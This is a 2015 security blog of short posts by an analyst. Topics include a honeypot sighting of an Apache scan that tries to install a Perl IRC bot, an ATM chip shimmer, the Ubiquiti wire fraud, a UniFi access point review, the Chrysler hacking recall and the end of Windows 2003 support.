Security Analyst – Jeff Soehner CISSP, GXPN,GPYC,GMOB,GCIH

I have seen some activity recently in a honeypot I run that shows some automated scanning for apache. The intent of this automated scan seems to be to seek out and join an Apache server to an IRC botnet using perl. (For those of you unfamiliar with these terms I attempt to define them below).

HoneyPOT (a computer that is intentionally setup as a sacrifice to impersonate well known services that would be used such as apache for a web server, MySQL for a database, etc.)

BotNET (a collection of computers that can be used by one or more people to hijack your computer and use it to launch attacks, send spam, etc.)

In my research I observed an attempt to run a script being hosted on a server in Spain (7soles.com) that is downloaded from a website. It is then executed using perl and can provide a host of services including flooding attacks and spam.

For those of you still reading I have included the link to the script here. It’s not rocket science but it looks like a nicely tested platform – resembling a point and click malware using Internet Relay Chat as a command and control channel. It also looks like it is currently designed to be reporting into a site in Germany.

For most of my contemporaries this is old news but for the rest of you, welcome to the new Internet. Looks a lot like any North American city in the downtown core – watch your purse and get a carry permit for a handgun.

Mexicians are fast on their way to mastering the art of ATM fraud which is fortunate because Americans are still behind the times when it comes to chip and pin credit cards. I, for one, was happy to regale the benefits of Chip Cards until I read about this story.

ATM ‘Shimmer’ Found in Mexico http://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/

Someone has now managed to create a card reader, complete with chip reader not the magnetic strip reader we all used to see and hear about. It is so small that it fits inside the card reader so you may never know that it is being used!

So much for chip and pin technology – what are we going to do now?

Almost 35 years ago today Jeff Wayne prophesized about the end of the world as told by the great Richard burton in the musical version of War of the Worlds. Who would have guessed that the perseids meteor shower would be at it greatest tonight on August 12. (perseids-2015)

For those of you who have not heard the musical the story goes something like this…

“..at midnight on the 12th of August a huge mass of luminous gas erupted from Mars and sped toward earth.   Across 200 million miles of void, invisibly hurtling towards us came the first of the missiles that were to bring so much calamity to earth.”

Shout out to all those Armageddon peddlers – maybe tonight really does mark the beginning of the end of the world… End of the World

http://www.sec.gov/Archives/edgar/data/1511737/000157104915006288/t1501817_8k.htm

In this securities and exchange commission filing Ubiquity Networks reports about a breach in which someone impersonated an employee in order to transfer funds with almost 50 million dollars.

After noticing the theft and contacting the necessary parties they were able to recover some of it but over 30 million still remains missing.

More for companies to worry about as the shift from data to cold hard cash begins. It’s time to get your computer networks in good order or you too can suffer the wrath

Ubiquity has produced a very nice range of Access points that are quite affordable for the home user. Sure you can get away with a consumer grade router that includes Wi-Fi but for those of us who are a little more concerned with security, have several devices and wish to use a multipronged deployment you need to consider a separate solution.

For just over 300.00 we Canadians can have three Ubiquity Access Points (model UAP) each capable of creating/extending Wi-Fi in your home up to a maximum radius of approx. 400ft. (YMMV – solid objects such as concrete, walls, etc. and electrical wiring can interfere and reduce your effective coverage area). Installation can be as simple as putting an AP on each floor in various sections of your home.

You can even add an outdoor AP (shown in our representation below) to your installation and extend the same unified wireless network into your backyard. 

UniFi APs allow you to have up to four networks (SSIDs) broadcasted from the same access points so you can create one for your phones, your kids, your guests – anything you wish. You can then use the power of the EdgeMax router product (additional cost as low as $150.00) to manage security, bandwidth and the Internet without any other products.

All you need is the 3 pack of wireless APs, an edgemax router and an internet connection and for under $500.00 you can have full speed wireless all over your home or office for up to 100 concurrent clients (YMMV).

But wait, there is more. When you install the software on a beefy PC (either dedicated or shared as your primary PC) you can have reporting (Insights)! Imagine monitoring your usage, usage for your kids, your guests and even those drive-by hackers who might be trying to break in and steal your bandwidth – long passphrases make good neighbours :-). You can setup alerts to send you emails whenever some device fails authentication or goes over a bandwidth cap.

The Unify controller uses Java so please be sure to install it and keep it up to date to avoid issues with your Java runtime. After you open the Controller application you will get a link like this.

Once the application has loaded you can click on the link inside the splash screen to open the management console (you can also launch it by typing https://localhost:8443/). I selected the existing AP I had and it indicated that there was an upgrade so I clicked on Upgrade to apply the newest firmware to my existing access point. This helps make it easy to keep them safe and secure.

The management controller software comes with it’s own hotspot feature so home office and small business can deploy this quickly and give guests a onetime Internet Voucher that can last a minimum of 8 hours and up to a user configurable period. This helps control access to Internet resources by reception or other staff and can help avoid reuse later once the office are closed. Personally I feel this is a great way to get access to network resources after visiting a site. Most home/companies seldom change passphrases on their own networks and rarely use guest networks.

I think this is a great medium range product line that can help most home owners and small business users deploy wireless safely and effectively without exposing their systems to hackers.

The date is July 29 2015, imagine someone miles and miles away with a laptop, a cell phone and some malicious software. You are driving along with your kids on a summer vacation when suddenly you tune into a new radio station and all of a sudden you loose control of your vehicle and crash!

Does this sounds like a page from The Twilight Zone? Well it’s not – it’s real. Earlier this month Chrysler announced that it had a confirmed vulnerability for most of it’s cars and trucks since 2013 (almost 1.4 million vehicles) and was forced to issue a recall by the national highway traffic safety administration (NHTSA).

Click to access RCRIT-15V461-7681.pdf

I perused this document that was designed to help dealers fix this vulnerability and I am not exactly sure that most of us would be able to do this. You should keep in mind that flashing firmware can leave any device in a state that will not function.

For some of us who feel bold enough to try it there are instructions on how to do it yourself but if you are like me and would just take the time to get it done by the dealer just imagine for a moment that some mechanic at your dealership takes a USB drive that flashes one car and decides to use it over and over again. What if someone was smart enough to download a Trojan to your radio before you or someone like you gets around to taking your vehicle in to get the fix. If that mechanic reuses that USB drive your car could get hacked again and maybe this time it is even worse.

Security is something that we all take for granted. Gone are the days when the government could protect you from safety and health issues when it comes computers. We have too many devices now and in our haste to computerize everything, safety has fallen out of scope.

We, as a society, need to demand that our governments legislate security into our products and cloud based services with legislative oversight, mandatory compliance and testing (remember when automotive insurance and seat belts were voluntary?) Until then, we are all left to fend for ourselves. Get ahead of the learning curve and educate yourself on how to avoid getting hacked. Think about safety when it comes to using the Internet and computers of any kind. After all we are now living in the future…

Wow, it didn’t take long to discover that the US government could do more with those unarmed aerial vehicles than just bomb targets, why not hack them with malware too!

Boeing and Hacking Team want drones to deliver spyware

http://www.engadget.com/2015/07/18/boeing-and-hacking-team-spyware-drones/?ncid=rss_truncated

Well this past Tuesday marked a very special Tuesday and it appears to have passed without the sky falling (unlike last years Windows XP patch Tuesday). If you have had your head buried in the sand we may not have been aware but July 14 2015 was the very last day that Microsoft would be sending out patches for your Windows 2003 servers.

With the official death of all windows 5.X kernels you may be interested to know that there are still several hacks available to exploit these machines if you still find yourself needing to use them. If you must continue to use them you might want to inventory your traffic to/from these machines to be sure they are not actively being exploited.

Early last year Microsoft patched MS14-002 for a previously unknown bug that was actively being exploited in combination with an adobe vulnerabilitiy CVE-2013-3346. The bug exploited several routines in their kernel and without that patch – there would be millions of machines still vulnerable. HP has estimated that there were approx. 11 million of these systems in the market so unless you were not one of the companies that migrated to a newer version of Microsoft Server you are probably vulnerable to the next attack. Without paying Microsoft for extended support to get access to patches if/when they create them you could and will probably be attacked.

There is still a concern for businesses that are only using windows 2003 server on their inside network. It still represents a risk to your organization when an intruder is pivoting (connecting to multiple computers from one computer or device). You should also consider an insider attack whether it is willful or not. I always suggest to my clients that they do not discount an disgruntled employee from attacking their network but bringing your own device (BYOD) or Tablets/Smart phones can be used successfully to launch an attack once inside your network.

Consider this, you travel to a hotel on business and connect to the hotel W-Fi network. Free Wi-Fi has become a necessity for businesses and the infrastructure costs offer no revenue generation. The last thing a company can afford is to monitor/maintain those devices so they become an attack surface for hackers to exploit. Your wireless device silently becomes the victim of malware that is designed to search for computers. When you come back from your trip you pass right by security and connect to your home or business network. Its like smuggling your attacker right in the back door and giving them full access to your network.

Remember the top 20 controls and monitor your networks – you never know who might be lurking in the shadows…